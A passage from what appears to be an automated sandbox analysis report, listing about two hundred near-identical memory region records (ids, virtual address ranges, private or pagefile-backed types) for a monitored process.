"pagefile_0x0000000000470000" filename = "" Region: id = 6696 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6697 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6698 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6699 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6700 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6701 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6702 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6703 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6704 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6705 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6706 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6707 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6708 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6709 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6710 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6711 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6712 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6713 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6714 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6715 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6716 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6717 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6718 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6719 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6720 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6721 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6722 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6723 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6724 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6725 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6726 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6727 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6728 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6729 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6730 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6731 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6732 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6733 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6734 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6735 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6736 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6737 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6738 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6739 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6740 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6741 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6742 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6743 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6744 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6745 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6746 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6747 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6748 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6749 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6750 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6751 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6752 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6753 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6754 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6755 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6756 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6757 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6758 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6759 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6760 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6761 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6762 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6763 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6764 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6765 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6766 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6767 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6768 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6769 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6770 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6771 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6772 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6773 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6774 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6775 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6776 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6777 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6778 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6779 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6780 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6781 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6782 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6783 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6784 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6785 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6786 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6787 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6788 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6789 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6790 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6791 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6792 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6793 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6794 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6795 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6796 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6797 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6798 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6799 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6800 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6801 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6802 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6803 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6804 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6805 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6806 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6807 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6808 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6809 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6810 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6811 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6812 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6813 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6814 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6815 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6816 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6817 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6818 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6819 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6820 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6821 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6822 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6823 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6824 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6825 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6826 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6827 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6828 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6829 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6830 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6831 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6832 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6833 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6834 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6835 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6836 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6837 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6838 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6839 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6840 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6841 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6842 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6843 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6844 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6845 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6846 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6847 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6848 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6849 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6850 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6851 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6852 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6853 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6854 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6855 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6856 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6857 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6858 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6859 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6860 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6861 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6862 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6863 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6864 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6865 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6866 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6867 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6868 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6869 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6870 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6871 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 6872 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6873 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6874 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6875 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6876 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6877 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6878 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6879 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6880 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6881 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6882 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6883 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6884 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6885 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6886 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6887 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6888 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6889 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6890 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6891 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6892 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6893 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6894 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6895 